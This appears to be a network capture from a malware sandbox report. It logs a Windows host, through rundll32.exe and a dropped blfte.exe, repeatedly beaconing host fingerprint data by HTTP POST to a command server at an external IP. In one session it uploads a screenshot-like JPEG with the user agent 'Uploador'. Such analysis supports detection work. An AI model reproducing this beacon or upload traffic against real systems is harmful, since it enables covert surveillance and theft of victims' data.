                                                                                                                                          Data Ascii: \ [K*12_|Mb|V04S_i3m|1V5em=9$je5\zI]yMJJ%ed(~wS#x2~'kk)uI4J$k}sx]MV70Q]~N[<|u


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          459192.168.2.450025176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:23.219957113 CEST11896OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          46192.168.2.449771176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:17.921405077 CEST4544OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          460176.111.174.11480192.168.2.450025C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:23.318248987 CEST11928INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:23 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          461192.168.2.450027176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:23.531749964 CEST12091OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          462176.111.174.11480192.168.2.450027C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:23.637419939 CEST12120INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:23 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          463176.111.174.11480192.168.2.450024C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:23.662188053 CEST12121INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:23 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          464192.168.2.450029176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:23.846836090 CEST12121OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          465176.111.174.11480192.168.2.450029C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:23.944582939 CEST12122INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:23 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          466192.168.2.450030176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:24.147510052 CEST12122OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          467176.111.174.11480192.168.2.450030C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:24.248717070 CEST12123INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:24 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          468192.168.2.450031176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:24.458761930 CEST12123OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          469176.111.174.11480192.168.2.450031C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:24.555840015 CEST12124INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:24 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          47176.111.174.11480192.168.2.449771C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:18.020920038 CEST4544INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:17 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          470192.168.2.450032176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:24.800692081 CEST12124OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          471176.111.174.11480192.168.2.450032C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:24.908600092 CEST12125INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:24 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          472192.168.2.450034176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:25.131279945 CEST12125OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          473176.111.174.11480192.168.2.450034C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:25.245347023 CEST12126INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:25 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          474192.168.2.450035176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:25.482793093 CEST12127OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          475176.111.174.11480192.168.2.450035C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:25.586595058 CEST12127INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:25 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          476192.168.2.450036176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:25.801202059 CEST12127OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          477176.111.174.11480192.168.2.450036C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:25.897419930 CEST12128INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:25 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          478192.168.2.450037176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:26.105434895 CEST12129OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          479176.111.174.11480192.168.2.450037C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:26.209476948 CEST12129INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:26 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          48192.168.2.449772176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:18.234110117 CEST4545OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          480192.168.2.450038176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:26.279259920 CEST12142OUTPOST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227171
                                                                                                                                          Data Raw: 2d 2d 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fc 50 8a 2f 2e 9f 52 fd 8f 77 5c d2 ec 35 fa 5c 69 9f 07 ce 47 1f 7a 75 7b 17 c1 af d8 53 f6 86 f8 d3 e1 3b 2f 89 1a 56 81 65 a2 f8 4f 50 9e 48 ad 3c 51 e2 2b f5 b7 b5 99 a3 72 92 18 91 43 4f 70 15 c1 56 30 c5 26 d2 08 38 22 bd df e1 ff 00 fc 13 93 e0 87 85 f6 5d 7c 4a f1 de b3 e2 bb c5 5c b5 9e 91 12 e9 b6 28 e0 f4 f3 1c 49 35 c4 67 d9 6d 9f e9 58 d5 c4 e1 e9 68 e5 af 91 ac 28 56 a8 ae 96 87 c5 29 f7 6a c2 7d da fd 19 bd fd 87 ff 00 63 8f 1a 78 7f ec 6f f0 5a 7f 0f c8 cd 95 d4 7c 2f e2 7b e5 b8 07 8c 03 f6 e9 2e a2 2b ea 3c b0 c7 b3 0a f2 1f 88 7f f0 49 df 12 c4 b2 5d fc 0b f8 c9 a4 eb a0 6e 31 e8 fe 27 87 fb 22 f1 cf 50 89 29 79 2d 58 01 c6 f9 26 87 24 7d d1 9e 2a 9e 3f 0f 3d f4 f5 26 b6 0e bc 76 57 f4 3e 45 a4 55 c6 45 76 df 16 7f 67 5f 8e 7f 01 ee a3 8b e2 ef c2 bd 6b 42 8a 79 0a 59 df de 59 37 d8 ef 08 19 fd c5 ca e6 19 c6 3b c6 ec 38 3c f1 5c 5b 6f ef 5d d1 94 65 0b a7 73 85 a9 45 d9 90 c7 1b d0 fd 3f 1a 96 9a f8 ee 29 72 15 cd 76 57 93 b5 44 e3 9f ad 4b 27 6a 6e dd dc 62 b1 94 4d e3 b9 4e 44 3e b5 1d 7e c7 f8 9b fe 0d 34 d5 7c 37 75 f6 7b ff 00 db 9f 74 2e d8 86 e5 3e 18 65 5f ff 00 2a 7c 1f 6f e6 39 aa d6 bf f0 6a 22 dc f5 fd bd f6 ff 00 dd 2d cf fe e5 2b f3 2a de 2b f0 05 29 b8 4f 19 66 bf e9 dd 6f fe 56 7d 64 38 4b 88 a5 1e 65 43 4f f1 43 ff 00 92 3f 1e a3 eb f8 54 be 53 fa 57 ec 8d b7 fc 1a 4e 2e 17 1f f0 f0 1d bc ff 00 d1 29 cf fe e5 6b f2 8b f6 87 f8 44 df b3 ff 00 ed 09 e3 df 80 8f af 8d 58 f8 27 c6 5a a6 80 75 51 6b e4 0b c3 67 77 2d bf 9d e5 ee 6f 2f 7f 97 bb 6e e6 db 9c 64 e3 35 ef 70 ff 00 19 70 df 13 d5 9d 3c b2 bf b4 94 12 6f dd 9c 6c 9e 9f 6a 31 fc 0f 3b 31 c9 73 3c ae 2a 58 aa 7c a9 e8 b5 8b fc 9b 38 a7 39 38 a1 36 7f 1d 39 d1 b3 9a 65 7d 49 e5 0e 65 fe e5 21 56 5e a2 92 9d bc d0 1b 11 f9 7e f4 2a f7 34 f7 eb 5f af bf f0 6e 6f fc 12 17 f6 1d ff 00 82 90 7e cd
